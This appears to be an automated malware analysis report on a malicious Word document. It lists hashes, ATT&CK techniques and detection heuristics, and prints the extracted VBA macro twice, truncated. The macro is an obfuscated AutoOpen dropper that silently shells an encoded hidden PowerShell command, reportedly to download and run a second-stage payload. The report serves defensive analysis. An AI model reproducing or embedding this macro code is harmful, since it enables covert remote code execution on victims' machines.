Office (OLE) malware analysis — malicious · 8e0de460b9fda2be

MALICIOUS

Office (OLE)

96.5 KB Created: 2018-05-25 07:05:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 99db04dd333aeb461aeef0a737812483 SHA-1: 610b769e0f2046a9bd10ecf94f51bf8a00f8ef7c SHA-256: 8e0de460b9fda2be0a5598feaffe9a0faa477f28848503df55aca29e02a5d73f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The Autoopen macro executes a Shell command, which in turn invokes PowerShell. The PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6556818-0' further supports its role as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6556818-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6556818-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15765 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15765 bytes
SHA-256: `5c554edb395bb0d18093e4f1d18f250f0c3f3c1b680b12d11ec04912eebea496`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wvjUjsVjRBrV" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function jwYUlUitb() On Error Resume Next jcmsY = XkTIEv - Cos(JjKCSM) * 1 - Chr(46272) / 791 - ChrB(XXtizw) ILfkQ = 29731 AAoik = TCpLf - Cos(jSmIu) * 1 - Chr(56226) / 7718 - ChrB(EOwqi) kKzYKN = 87619 jwYUlUitb = OZBGiUw + UEWdJEAOsON + NujwnRHpS + MGlChHC + fcNMwK + DcVRRKB + GBFrAMFOT + mNAujY + anVmvLWiMQk JCiin = PUihCm - Cos(hVClH) * 1 - Chr(24438) / 28010 - ChrB(mCwzI) IFQAS = 37564 End Function Sub Autoopen() On Error Resume Next JkiMp = ljfQn - Cos(NDovnD) * 1 - Chr(828) / 59615 - ChrB(XzjjfW) PSjkS = 84634 IliiOwThNXo (jwYUlUitb) lXYSB = jGlKGu - Cos(TKdzR) * 1 - Chr(77948) / 47133 - ChrB(kwdKoi) NjCaV = 58885 End Sub Function IliiOwThNXo(wuUwBwzUY) On Error Resume Next XOlwB = RNVck - Cos(nFpjS) * 1 - Chr(57658) / 37508 - ChrB(AYvHNz) sCHjZ = 78939 mOMTm = UWdAa - Cos(qPYzkw) * 1 - Chr(4659) / 83791 - ChrB(wTdkC) YLOwL = 26544 lpqioDlwUHX = Shell(iTufUbVfRZ + Chr(vbKeyP) + UpMwoZj + wuUwBwzUY, vbHide) SaXzr = Sivuh - Cos(IzUCXj) * 1 - Chr(43431) / 95148 - ChrB(ouiik) vLOEP = 45426 End Function Attribute VB_Name = "zzckFrYYC" Function OZBGiUw() On Error Resume Next rjKdt = wTJdAo - Cos(EjjIa) * 1 - Chr(2091) / 21700 - ChrB(zOwJH) dTszz = 87180 ocPCSzVXI = "owersH" + "eLL -WinDow" + "sTyle " + "hidden -e I" + "AAuACgAKABnAG" + "UAVAAtA" + "HYAYQBy" + "AEkAQQBCAGw" + "AZQAgACc" + "AKgBtAEQAcgAqAC" QHmLMs = zGduTc - Cos(oIVkSK) * 1 - Chr(98123) / 84957 - ChrB(LUmXS) QiAvb = 77451 XziUj = "cAKQAuAG4AYQ" + "BNAEUA" + "WwAzACwAMQ" + "AxACwA" + "MgBdAC0AagBvA" + "EkAbgAnACcAKQAo" + "ACAAKA" + "AoACIAewAxADcA" + "fQB7ADEAMAB9AHs" + "ANAA3AH0A" zwOIR = skEqi - Cos(oKXOjj) * 1 - Chr(84930) / 46250 - ChrB(arZVaz) wtXBAP = 22323 jZpqOsawF = "ewAxADIANgB9AH" + "sANwAzAH0Aew" + "AzADEAfQ" + "B7ADkANAB" + "9AHsAMQAxAD" WKsoz = HdIviq - Cos(PUMjQk) * 1 - Chr(43807) / 10370 - ChrB(mrLDmL) dbZww = 85519 vGmKjHbzOr = "UAfQB7ADk" + "AOQB9AH" + "sANQA5AH" + "0AewA" + "xADAAMAB9AHs" + "AOQAwAH0Ae" + "wAzADcAf" OZBGiUw = ocPCSzVXI + XziUj + jZpqOsawF + vGmKjHbzOr End Function Function UEWdJEAOsON() On Error Resume Next rDYGT = RawJw - Cos(ZLRkio) * 1 - Chr(37360) / 64912 - ChrB(Acvvv) iTFru = 45208 nZZWSjTS = "QB7ADEAMgA0A" + "H0AewA3ADAAf" + "QB7ADIAMQB9A" + "HsAMAB9" + "AHsAMgA3A" VfriDr = MuCGD - Cos(HLruJf) * 1 - Chr(20614) / 95780 - ChrB(bcLXCm) rRCLb = 81410 TnbmfV = "H0Aew" + "A4ADYAfQB7AD" + "YAMQB9AHsAOQA4A" + "H0AewA" + "1ADUA" sAlbKL = aprKD - Cos(cKhPM) * 1 - Chr(362) / 59404 - ChrB(OSjok) DkEsK = 33068 msPQuEM = "fQB7A" + "DQAMAB9AHsANwB9" + "AHsAMQAwADYAf" + "QB7ADYAN" + "gB9AHs" + "AMwA4AH" + "0AewA1ADYAfQB7" + "ADgAMQB9AH" + "sAMQAxA" wuYDA = jAnTNz - Cos(ijkmw) * 1 - Chr(52339) / 22013 - ChrB(ihFmZF) qkwzm = 89196 IXXHUBarZ = "DQAfQB7ADIAN" + "gB9AHsANQA3A" + "H0AewA3ADQAf" + "QB7ADEAMgAxAH0" + "AewA3ADYAf" + "QB7ADEA" + "MAA3AH0AewA0A" + "DEAfQ" QJLMOu = awSpR - Cos(WASujF) * 1 - Chr(82873) / 39249 - ChrB(TQajj) DUNNY = 823 OMwkNnGjrJ = "B7ADYAMgB" + "9AHsA" + "NAA0AH0AewAxAD" + "EAMgB9AHsA" + "NwA5AH0AewAx" + "ADkAfQB7AD" balMQ = DjmzIi - Cos(qSEQjD) * 1 - Chr(17734) / 8098 - ChrB(vmiOtX) FbsbGY = 83805 uKIcNUipZJ = "YAfQB7AD" + "UAOAB9AHs" + "ANwA1AH0AewAxA" + "DIAMAB9AHs" + "AMQAyAH0Aew" + "A4ADQAfQB7A" + "DEAMQB" + "9AHsAMQ" + "A1AH0AewAxADQAf" WpMQd = SRBATl - Cos(zhVrM) * 1 - Chr(72502) / 59851 - ChrB(iCkjEj) PCaRa = 91740 HlFiOHTzd = "QB7ADEAM" + "QA4AH0AewAxAD" + "IANQB9AHsAO" + "AA4AH0Aew" + "AxADAAMwB9A" + "HsAMQAx" + "ADMAfQB7" + "ADEAMQA5AH0AewA" + "4ADkAfQB7" qqsaIc = jNZmN - Cos(uXkun) * 1 - Chr(23961) / 18591 - ChrB(mckYAw) zaCKU = 6857 rZisqw = "ADcAMQB9AH" + "sANgA5AH0" + "AewA2ADUAfQB7" + "ADQAOAB9AHsA" fwldCi = pKurZc - Cos(SfiOmC) * 1 - Chr(7937) / 26442 - ChrB(CHjRj) XbtEDs = 72163 ZqRPLwT = "OAA1A" + "H0AewA0ADUAfQB" + "7ADQANg" + "B9AHsAO ... (truncated)

SHA-256: 5c554edb395bb0d18093e4f1d18f250f0c3f3c1b680b12d11ec04912eebea496

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wvjUjsVjRBrV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jwYUlUitb()
On Error Resume Next
jcmsY = XkTIEv - Cos(JjKCSM) * 1 - Chr(46272) / 791 - ChrB(XXtizw)
ILfkQ = 29731
AAoik = TCpLf - Cos(jSmIu) * 1 - Chr(56226) / 7718 - ChrB(EOwqi)
kKzYKN = 87619
jwYUlUitb = OZBGiUw + UEWdJEAOsON + NujwnRHpS + MGlChHC + fcNMwK + DcVRRKB + GBFrAMFOT + mNAujY + anVmvLWiMQk
JCiin = PUihCm - Cos(hVClH) * 1 - Chr(24438) / 28010 - ChrB(mCwzI)
IFQAS = 37564
End Function
Sub Autoopen()
On Error Resume Next
JkiMp = ljfQn - Cos(NDovnD) * 1 - Chr(828) / 59615 - ChrB(XzjjfW)
PSjkS = 84634
IliiOwThNXo (jwYUlUitb)
lXYSB = jGlKGu - Cos(TKdzR) * 1 - Chr(77948) / 47133 - ChrB(kwdKoi)
NjCaV = 58885
End Sub
Function IliiOwThNXo(wuUwBwzUY)
On Error Resume Next
XOlwB = RNVck - Cos(nFpjS) * 1 - Chr(57658) / 37508 - ChrB(AYvHNz)
sCHjZ = 78939
mOMTm = UWdAa - Cos(qPYzkw) * 1 - Chr(4659) / 83791 - ChrB(wTdkC)
YLOwL = 26544
lpqioDlwUHX = Shell(iTufUbVfRZ + Chr(vbKeyP) + UpMwoZj + wuUwBwzUY, vbHide)
SaXzr = Sivuh - Cos(IzUCXj) * 1 - Chr(43431) / 95148 - ChrB(ouiik)
vLOEP = 45426
End Function


Attribute VB_Name = "zzckFrYYC"
Function OZBGiUw()
On Error Resume Next
rjKdt = wTJdAo - Cos(EjjIa) * 1 - Chr(2091) / 21700 - ChrB(zOwJH)
dTszz = 87180
ocPCSzVXI = "owersH" + "eLL -WinDow" + "sTyle " + "hidden -e I" + "AAuACgAKABnAG" + "UAVAAtA" + "HYAYQBy" + "AEkAQQBCAGw" + "AZQAgACc" + "AKgBtAEQAcgAqAC"
QHmLMs = zGduTc - Cos(oIVkSK) * 1 - Chr(98123) / 84957 - ChrB(LUmXS)
QiAvb = 77451
XziUj = "cAKQAuAG4AYQ" + "BNAEUA" + "WwAzACwAMQ" + "AxACwA" + "MgBdAC0AagBvA" + "EkAbgAnACcAKQAo" + "ACAAKA" + "AoACIAewAxADcA" + "fQB7ADEAMAB9AHs" + "ANAA3AH0A"
zwOIR = skEqi - Cos(oKXOjj) * 1 - Chr(84930) / 46250 - ChrB(arZVaz)
wtXBAP = 22323
jZpqOsawF = "ewAxADIANgB9AH" + "sANwAzAH0Aew" + "AzADEAfQ" + "B7ADkANAB" + "9AHsAMQAxAD"
WKsoz = HdIviq - Cos(PUMjQk) * 1 - Chr(43807) / 10370 - ChrB(mrLDmL)
dbZww = 85519
vGmKjHbzOr = "UAfQB7ADk" + "AOQB9AH" + "sANQA5AH" + "0AewA" + "xADAAMAB9AHs" + "AOQAwAH0Ae" + "wAzADcAf"
OZBGiUw = ocPCSzVXI + XziUj + jZpqOsawF + vGmKjHbzOr
End Function
Function UEWdJEAOsON()
On Error Resume Next
rDYGT = RawJw - Cos(ZLRkio) * 1 - Chr(37360) / 64912 - ChrB(Acvvv)
iTFru = 45208
nZZWSjTS = "QB7ADEAMgA0A" + "H0AewA3ADAAf" + "QB7ADIAMQB9A" + "HsAMAB9" + "AHsAMgA3A"
VfriDr = MuCGD - Cos(HLruJf) * 1 - Chr(20614) / 95780 - ChrB(bcLXCm)
rRCLb = 81410
TnbmfV = "H0Aew" + "A4ADYAfQB7AD" + "YAMQB9AHsAOQA4A" + "H0AewA" + "1ADUA"
sAlbKL = aprKD - Cos(cKhPM) * 1 - Chr(362) / 59404 - ChrB(OSjok)
DkEsK = 33068
msPQuEM = "fQB7A" + "DQAMAB9AHsANwB9" + "AHsAMQAwADYAf" + "QB7ADYAN" + "gB9AHs" + "AMwA4AH" + "0AewA1ADYAfQB7" + "ADgAMQB9AH" + "sAMQAxA"
wuYDA = jAnTNz - Cos(ijkmw) * 1 - Chr(52339) / 22013 - ChrB(ihFmZF)
qkwzm = 89196
IXXHUBarZ = "DQAfQB7ADIAN" + "gB9AHsANQA3A" + "H0AewA3ADQAf" + "QB7ADEAMgAxAH0" + "AewA3ADYAf" + "QB7ADEA" + "MAA3AH0AewA0A" + "DEAfQ"
QJLMOu = awSpR - Cos(WASujF) * 1 - Chr(82873) / 39249 - ChrB(TQajj)
DUNNY = 823
OMwkNnGjrJ = "B7ADYAMgB" + "9AHsA" + "NAA0AH0AewAxAD" + "EAMgB9AHsA" + "NwA5AH0AewAx" + "ADkAfQB7AD"
balMQ = DjmzIi - Cos(qSEQjD) * 1 - Chr(17734) / 8098 - ChrB(vmiOtX)
FbsbGY = 83805
uKIcNUipZJ = "YAfQB7AD" + "UAOAB9AHs" + "ANwA1AH0AewAxA" + "DIAMAB9AHs" + "AMQAyAH0Aew" + "A4ADQAfQB7A" + "DEAMQB" + "9AHsAMQ" + "A1AH0AewAxADQAf"
WpMQd = SRBATl - Cos(zhVrM) * 1 - Chr(72502) / 59851 - ChrB(iCkjEj)
PCaRa = 91740
HlFiOHTzd = "QB7ADEAM" + "QA4AH0AewAxAD" + "IANQB9AHsAO" + "AA4AH0Aew" + "AxADAAMwB9A" + "HsAMQAx" + "ADMAfQB7" + "ADEAMQA5AH0AewA" + "4ADkAfQB7"
qqsaIc = jNZmN - Cos(uXkun) * 1 - Chr(23961) / 18591 - ChrB(mckYAw)
zaCKU = 6857
rZisqw = "ADcAMQB9AH" + "sANgA5AH0" + "AewA2ADUAfQB7" + "ADQAOAB9AHsA"
fwldCi = pKurZc - Cos(SfiOmC) * 1 - Chr(7937) / 26442 - ChrB(CHjRj)
XbtEDs = 72163
ZqRPLwT = "OAA1A" + "H0AewA0ADUAfQB" + "7ADQANg" + "B9AHsAO
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.